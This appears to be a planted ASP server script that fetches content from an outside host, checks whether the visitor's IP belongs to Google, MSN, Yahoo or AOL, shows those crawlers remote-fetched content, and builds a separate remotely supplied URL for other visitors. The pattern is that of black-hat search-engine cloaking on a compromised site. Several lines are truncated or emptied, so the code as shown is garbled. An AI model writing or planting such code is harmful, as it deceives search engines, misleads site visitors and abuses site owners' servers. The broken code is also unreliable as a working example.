%
function getHTTPPage(url)
dim Http
set Http=server.createobject("MSXML2.XMLHTTP")
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then
exit function
end if
getHTTPPage=bytesToBSTR(Http.responseBody,"UTF-8")
set http=nothing
if err.number<>0 then err.Clear
end function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
Dim Url,Html
yyu=Year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)
if request("imgs")<>"" then
URL="http://wfen.a123.fr/ig_zc_22/NY_Tou_img.aspx?s_id=134&rnd="&yyu&"&p_id="&request("imgs")
else if request("pageIndex")<>"" then
URL="http://wfen.a123.fr/ig_zc_22/LB_Tou_img.aspx?s_id=134&rnd="&yyu&"&pageIndex="&request("pageIndex")&""
else
URL="http://wfen.a123.fr/ig_zc_22/LB_Tou_img.aspx?rnd="&yyu&"&s_id=134"
end if
end if
Html = getHTTPPage(Url)
ip=Request.ServerVariables("REMOTE_ADDR")
ipurl="http://wfen.a123.fr/getdomain.aspx?rnd=1&ip="&ip
domain =getHTTPPage(ipurl)
if (instr(domain,"google")>0 or instr(domain,"msn.com")>0 or instr(domain,"yahoo.com")>0 or instr(domain,"aol.com")>0) then
set re = new RegExp
re.IgnoreCase =True
re.Global = True
re.Pattern = "","")
Response.write Html
else
if request("imgs")<>"" then
ccc=request("imgs")
ccc=replace(ccc," ","-")
ccc=replace(ccc,"--","-")
ddd=getHTTPPage("http://wfjs.a123.fr/nken.txt")
eee=ddd&ccc&".html"
eee=replace(eee,"--","-")
Response.write ""
end if
Response.end
end if
%>